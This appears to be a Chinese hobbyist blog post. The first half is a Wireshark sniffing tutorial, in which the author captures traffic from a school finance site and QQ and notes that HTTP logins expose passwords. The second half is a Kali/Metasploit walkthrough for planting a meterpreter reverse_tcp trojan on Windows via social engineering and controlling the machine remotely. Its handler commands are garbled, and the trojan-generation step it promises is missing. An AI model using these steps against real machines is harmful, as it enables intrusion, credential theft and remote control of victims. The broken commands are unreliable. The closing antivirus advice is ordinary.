wireshark抓包和利用kali（linux）攻击windows

简介

wireshark是一款操作简单，容易上手的网络抓包分析软件。百度可直接下载汉化版。玩了一下午，先后对本校财务处网站，QQ等进行抓包，写几点心得与大家分享一下。 
ps、抓包无非是对tcp/ip五层协议进行分析，所以阅读本文需要具备网络基础。

教程

点击+号，选择过滤流，可以只过滤网站； 
地址栏：可以选择过滤的协议http、tcp、dns等；oicq是QQ；

tcp三次握手

在得到http响应时，进行三次tcp握手； 

1、第一次握手：客户端发送syn=0 

2、第二次握手：服务器ack+1 

3、第三次握手：syn+1 

追踪tcp流

右键选择追踪流，可显示相关流的信息，出现乱码，证明该流是加密的，如QQ消息； 

通过5层协议分析 QQ

1、应用层

 
开头：oicq-im软件 
data流显示了QQ号

2、传输层

在两个主机间提供多种服务，包括建立连接、终止； 

UDP传输：源端口8000（国内默认为QQ的端口），目的端口4002；

3、协议层

逻辑寻址，路由选择，确定最佳路线； 

IPv4的版本；src源地址、dst目的地址； 
存活时间56；

4、数据链路层

为了适应物理介质中传输，将数据格式化成帧； 

目的MAC、源MAC；路由MAC；

5、物理层

物理特征； 

网络接口、设备地址；

另外可以对http网站抓包分析出，登陆是传输的账号和密码；这个挺有意思的哦！！

利用kali（linux）攻击windows

许多人觉的杀毒软件没啥乱用，留着占内存，或者在安全卫士和杀毒两个之间取舍一个，，，我想说的是，这太没有文化了。。文末会告诉大家为什么太没有文化的原因，，敬请往后看。。。

今天我给大家带来的是Hacker如何使用 三行代码入侵Windows的教程。

环境：kali+Windows xp

工具:kali>metasploit

有人肯定要想kali是什么呢，请看下图LOGO，看见没，是不是很霸气的一条带翅膀的龙！！超爱这个logo。。。咦，该进入正题了。。

 

在kali环境下root输入一下三行代码

（LHOST 本地ip）此时就生成了一个名为test.exe的测试木马。。

Msf> use exploit/multi/handler

(handler)>set payloud windows/meterpreter/reverse_tcp

  >show options

  >show LHOST 本地ip 

  >exploit

(此时这个木马就已经加载好了，如下图的监听模式）

接下来就是想办法让Windows下载这个木马并加载，这就要看自己的套路有多深了，我就不多赘述（具体可以看 社会工程学 这本书）。

我自己的Windows 下载了这个木马。。打开之后我的Windows边已经被监听了，Windows里面的内容被暴露无疑。。

 

•reboot-重新启动受害人的计算机（现在知道你的电脑为啥无缘无故就重启了吧，Hacker一个命令而已）

•ps -列出正在运行的进程

一个ps命令的使用，使你电脑里面的所有文件被光天化日的拉出来了，而这一切的一切都在毫无察觉的情况下发生了。

看起来好厉害，对吧。。。那如何防止这种事情发生呢。

1.不要随便点击来历不明的文件以及安装包。要到正规网站下载。

2.安装杀毒软件和安全卫士